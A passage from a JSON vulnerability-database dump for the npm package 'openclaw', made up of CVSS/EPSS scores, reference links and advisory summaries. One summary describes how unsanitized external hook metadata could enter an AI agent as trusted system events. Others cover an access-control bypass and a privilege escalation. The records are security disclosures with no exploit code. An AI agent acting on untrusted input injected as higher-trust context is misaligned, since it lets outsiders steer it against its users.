"VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "GHSA-jccr-rrw2-vc8h" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zf3q-78js-k7ce" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89446?format=api", "vulnerability_id": "VCID-zg68-u5b5-vkft", "summary": "OpenClaw: Agent hook events could enqueue trusted system events from unsanitized external input\n## Summary\n\nAgent hook events could enqueue trusted system events from unsanitized external input.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nAgent hook dispatch could turn externally supplied hook metadata into trusted system events, allowing untrusted input to enter the agent as higher-trust context.\n\n## Technical Details\n\nThe fix sanitizes hook names and marks agent hook system events as untrusted before enqueueing them.\n\n## Fix\n\nThe issue was fixed in #64372. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `e3a845bde5b54f4f1e742d0a51ba9860f9619b29`\n- PR: #64372\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43534", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05997", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06623", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06635", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43534" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/e3a845bde5b54f4f1e742d0a51ba9860f9619b29", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-06T14:12:17Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/e3a845bde5b54f4f1e742d0a51ba9860f9619b29" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/64372", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/64372" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7g8c-cfr3-vqqr", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-06T14:12:17Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7g8c-cfr3-vqqr" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43534", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43534" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-unsanitized-external-input-in-agent-hook-events", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "6.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-06T14:12:17Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-unsanitized-external-input-in-agent-hook-events" }, { "reference_url": "https://github.com/advisories/GHSA-7g8c-cfr3-vqqr", "reference_id": "GHSA-7g8c-cfr3-vqqr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7g8c-cfr3-vqqr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api", "purl": "pkg:npm/openclaw@2026.4.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6cfj-zugb-7uhq" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hphn-8fnj-qkh2" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-q3a2-qk5j-1yat" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10" } ], "aliases": [ "CVE-2026-43534", "GHSA-7g8c-cfr3-vqqr" ], "risk_score": 4.2, "exploitability": "0.5", "weighted_severity": "8.4", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zg68-u5b5-vkft" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89363?format=api", "vulnerability_id": "VCID-zkum-rn42-yyfs", "summary": "OpenClaw: Discord voice manager bypasses channel-level member access allowlist\n## Summary\nDiscord voice manager bypasses channel-level member access allowlist\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: v2026.3.28 still accepts Discord voice ingress before channel allowlist authorization, and main-only gating means this remains a real shipped access-control bug.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `dba96e7507e0900f120e5e28e57755d69bf78759` — 2026-03-31T21:29:13+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zsxsoft for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41381", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10395", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10436", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10417", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41381" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/dba96e7507e0900f120e5e28e57755d69bf78759", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:29:48Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/dba96e7507e0900f120e5e28e57755d69bf78759" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cqgw-44wg-44rf", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:29:48Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cqgw-44wg-44rf" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41381", "reference_id": "CVE-2026-41381", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41381" }, { "reference_url": "https://github.com/advisories/GHSA-cqgw-44wg-44rf", "reference_id": "GHSA-cqgw-44wg-44rf", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cqgw-44wg-44rf" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-access-control-bypass-in-discord-voice-manager-via-channel-allowlist", "reference_id": "openclaw-access-control-bypass-in-discord-voice-manager-via-channel-allowlist", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:29:48Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-access-control-bypass-in-discord-voice-manager-via-channel-allowlist" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41381", "GHSA-cqgw-44wg-44rf" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zkum-rn42-yyfs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89142?format=api", "vulnerability_id": "VCID-zpb1-e3g9-vkbh", "summary": "OpenClaw: Unbound bootstrap setup codes allow privilege escalation during pairing\n## Summary\nBootstrap setup codes were not bound to the intended device role and scopes, allowing first-use privilege escalation during pairing.\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real first-use bootstrap privilege-escalation bug fixed and shipped in v2026.3.22+, so keep open for publication with current severity.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.13-1`\n- Patched versions: `>= 2026.3.22`\n- First stable tag containing the fix: 